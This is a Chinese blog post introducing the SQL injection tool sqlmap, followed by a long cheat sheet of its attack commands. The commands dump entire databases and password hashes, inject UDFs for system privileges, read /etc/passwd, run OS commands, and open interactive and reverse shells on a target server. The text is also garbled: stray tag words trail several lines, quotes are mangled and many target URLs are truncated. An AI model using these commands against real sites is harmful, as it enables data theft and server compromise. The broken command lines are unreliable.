網上的注入工具不少,大多也有比較詳細的解釋,可是大部分windows下的注入軟件都是對本身軟件的一種推薦,並且不少也不是很是的安全,對於有些破解版原本說,極可能自身會被帶有木馬,因此,Linux下的注入工具也是很是強大的,不過度的說,能夠徹底取代Windows下面的全部注入工具。我所介紹的是一款名爲SQLMAP的注入工具,有感興趣的能夠去他的官網看看哦!javascript
首先,SQLMAP是一個開放源碼的滲透測試工具,它能夠自動探測和利用SQL注入漏洞來接管數據庫服務器。它配備了一個強大的探測引擎,爲最終滲透測試人員提供不少猥瑣的功能,能夠拖庫,能夠訪問底層的文件系統,還能夠經過帶外鏈接執行操做系統上的命令php
其次,SQLMAP支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等數據庫的各類安全漏洞檢測。java
SQLMAP支持五種不一樣的注入模式:sql
l 基於布爾的盲注,便可以根據返回頁面判斷條件真假的注入;shell
l 基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增長)來判斷;數據庫
l 基於報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中;windows
l 聯合查詢注入,可使用union的狀況下的注入;瀏覽器
l 堆查詢注入,能夠同時執行多條語句的執行時的注入安全
一些簡單的SQLMAP使用:服務器
1. 基礎用法:
一下./sqlmap.py 在kali和backtrack中使用sqlmap的時候,直接用:sqlmap
./sqlmap.py -u 「注入地址」 -v 1 –dbs // 列舉數據庫
./sqlmap.py -u 「注入地址」 -v 1 –current-db // 當前數據庫
./sqlmap.py -u 「注入地址」 -v 1 –users // 列數據庫用戶
./sqlmap.py -u 「注入地址」 -v 1 –current-user // 當前用戶
./sqlmap.py -u 「注入地址」 -v 1 –tables -D 「數據庫」 // 列舉數據庫的表名
./sqlmap.py -u 「注入地址」 -v 1 –columns -T 「表名」 -D 「數據庫」 // 獲取表的列名
./sqlmap.py -u 「注入地址」 -v 1 –dump -C 「字段,字段」 -T 「表名」 -D 「數據庫」 // 獲取表中的數據,包含列
sqlmap -u 「 –smart –dbms 「Mysql」 –users #列數據庫用戶
sqlmap -u 「 –smart –dbms 「Mysql」 –dbs#列數據庫
sqlmap -u 「 –smart –dbms 「Mysql」–passwords #數據庫用戶密碼
sqlmap -u 「 –smart –dbms 「Mysql」–passwords-U root -v 0 #列出指定用戶數據庫密碼
sqlmap -u 「 –smart –dbms 「Mysql」 –dump-all -v 0 #列出全部數據庫全部表
sqlmap -u 「 –smart –dbms 「Mysql」–privileges #查看權限
sqlmap -u 「 –smart –dbms 「Mysql」–privileges -U root #查看指定用戶權限
sqlmap -u 「 –smart –dbms 「Mysql」 –is-dba -v 1 #是不是數據庫管理員
sqlmap -u 「 –smart –dbms 「Mysql」 –roles #枚舉數據庫用戶角色
sqlmap -u 「 –smart –dbms 「Mysql」–udf-inject #導入用戶自定義函數(獲取系統權限!)
sqlmap -u 「 –smart –dbms 「Mysql」–dump-all –exclude-sysdbs -v 0 #列出當前庫全部表
sqlmap -u 「 –smart –dbms 「Mysql」 –union-check #是否支持union 注入
sqlmap -u 「 –smart –dbms 「Mysql」–union-cols #union 查詢表記錄
sqlmap -u 「 –smart –dbms 「Mysql」 –union-test #union 語句測試
sqlmap -u 「 –smart –dbms 「Mysql」 –union-use –banner #採用union 注入
sqlmap -u 「 –smart –dbms 「Mysql」–union-test –union-tech orderby #union 配合 order by
sqlmap -u 「 –smart –dbms 「Mysql」–method 「POST」 — data 「id=1&cat=2″ #post注入
sqlmap -u 「 –smart –dbms 「Mysql」–cookie 「COOKIE_VALUE」 #cookie注入
sqlmap -u 「 –smart –dbms 「Mysql」-b #獲取banner信息
sqlmap -u 「http://url/news?id=1」 –level=3 –smart-v 1 -f #指紋判別數據庫類型
sqlmap -u 「 –smart –dbms 「Mysql」–sql-shell #執行指定sql命令
sqlmap -u 「 –smart –dbms 「Mysql」–file /etc/passwd
sqlmap -u 「 –smart –dbms 「Mysql」–os-cmd=whoami #執行系統命令
sqlmap -u 「 –smart –dbms 「Mysql」–os-shell #系統交互shell
sqlmap -u 「 –smart –dbms 「Mysql」–os-pwn #反彈shell
sqlmap -u 「 –smart –dbms 「Mysql」–reg-read #讀取win系統註冊表
sqlmap -u 「 –smart –dbms 「Mysql」 –dbs-o 「sqlmap.log」 #保存進度
sqlmap -u 「 –smart –dbms 「Mysql」 –dbs -o 「sqlmap.log」 –resume #恢復已保存進度